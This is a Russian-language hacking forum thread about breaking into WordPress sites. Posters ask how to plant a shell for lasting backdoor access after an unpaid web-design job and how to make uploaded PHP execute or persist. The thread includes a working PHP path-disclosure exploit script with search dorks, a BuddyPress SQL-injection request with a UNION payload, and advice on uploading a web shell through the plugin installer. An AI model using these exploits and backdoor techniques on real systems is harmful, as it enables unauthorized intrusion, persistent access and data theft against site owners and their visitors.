подскажите , хостинг стоит на CPanel движок WordPress доступ есть полный и на хостинг админом и в админ панель WordPress что можно сделать или какой шелл залить что бы я всегда имел доступ и знал пароль в случае его смены ? проблема не оплаты за работу создания сайта , доступ пока у меня есть ко всему абсолютно но думаю скоро сменят пароли за советы буду благодарен !
Пагни, такое дело Есть wordpress 3.3.1 Права на заливку - онли wp-upload Залить пхп файл то я залил, но в этой дире он не выполнется. Пытался залить туда .htaccess - безрезультатно. Если нет прав на темплат, есть ещё способы? upd: из плагинов стоят дискус и адсэнс, но в них походу ничего нет
Раскрытие путей в WordPress >= 3.31 На данный момент, самая новая версия Данная уязвимость присутствует во многих файлах из директории wp-includes, например, файл /wp-includes/admin-bar.php Exploit (Exploit OsWpFp v.0.5): PHP: <form method=GET> <input type=text name=url> <input type=submit value="Check URL"> </form> <?php $url = $_GET['url']; //URL Site $site=$url.'/wp-includes/admin-bar.php'; $e = @file_get_contents($site); if($e and $e !== "") { $a = array("<br />\n<b>Fatal error</b>: Call to undefined function add_action() in "," on line <b>39</b><br />","/wp-includes/admin-bar.php","<br />\n<b>Fatal error</b>: Call to undefined function add_action() in ","Fatal error: Call to undefined function add_action() in "," on line 39"); for($i=0; $i < count($a); ++$i) { $e = explode($a[$i],$e); $e = implode("",$e); } echo "<hr size=1><span style=\"font-family: Calibri;\">Full path site <b>".$url."</b>:<br>".$e."<hr size=1>/*Exploit By Osstudio*/<br>\nICQ: 375647532</span>"; /*Exploit By Osstudio*/ } else { echo "Ожидание ввода, либо не удалось использовать!"; } ?> Веб версия эксплоита Dork: allinurl:.ru/wp-includes/admin-bar.php allinurl:.com/wp-includes/admin-bar.php (c) Osstudio
Это тебе дает раскрытие путей, что позволяет узнать путь сервера , которые нужен в различных вариантов развития событий, но в твоем случае думаю ничего не дает
пароль если сменят, ты получишь тока хэш его, он хранится в бд не в открытом виде. создай юзверя к БД с правами ещё одного... по поводу шелла хз, другие мб тебе подскажут, я таким не занимаюсь
Народ, есть что-нибудь на 2.9.2 версию? Через _tp://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts смогу к sql подобраться? Расскажите как сайт на 2.9.2 вскрыть, пожалуйста.
Code: # Exploit Title: Buddypress plugin of Wordpress remote SQL Injection # Date: March 31, 2012 # Author: Ivan Terkin # Exploitation: Remote Exploit # Bug: Remote SQL Injection # Software Link: buddypress.org # Version: till 1.5.5 # Tested on: Buddypress 1.5.4 POST /wp-load.php HTTP/1.1 User-Agent: Mozilla Host: example.com Accept: */* Referer: http://example.com/activity/?s=b Connection: Keep-Alive Content-Length: 153 Content-Type: application/x-www-form-urlencoded action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+ Reported to developers and fixed in version 1.5.5
Есть wordpress-сайт с уязвимым timthumb.php. Эксплоит отрабатывает, в директории "cache" создается файлик external_[хэш].php. Теперь не понятно, как народ закрепляется, фрэймит итд? если у скрипта external_[хэш].php прав на запись в директории и файло нехватет? Спасибо
столкнулся с невозможностью правки php файлов themes. идем в Plugin update.php?action=upload-plugin , там нет ограничений на расширения. туда заливаем наш шелл. идем в Media и видим его там.
К сожалению у меня для этого нет админки. Шелл я и так могу залить, не проблема. Проблема в том, что для закрепления нет прав для записи в каталогах и файлах.
Ребят,help есть админка вордпресса.там нету прав на шаблоны и плагины. пробовал залить php в плагины add new(plugins) но Forbidden! You are using WordPress 3.2.1 (дубль с експа)
пробовал update.php?action=upload-plugin нету такого адреса вроде как понял. ничего из из этого не помогает.help, проконсультируйте.